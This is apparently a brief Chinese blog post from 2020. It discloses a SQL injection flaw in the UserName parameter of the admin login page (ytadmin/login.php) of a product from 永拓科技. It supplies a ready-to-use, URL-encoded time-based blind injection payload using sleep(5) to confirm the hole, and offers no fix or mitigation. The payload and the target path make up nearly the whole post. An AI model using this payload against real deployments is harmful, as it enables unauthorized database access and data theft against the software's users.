永拓科技默认后台为ytadmin/login.php
UserName参数存在SQL注入
可使用%27%2b(select*from(select(sleep(5)))a)%2b%27进行判断
posted on 2020-12-25 18:25 icekind 阅读(138) 评论(0) 收藏 举报
博客园 © 2004-2026 浙公网安备 33010602011771号 浙ICP备2021040463号-3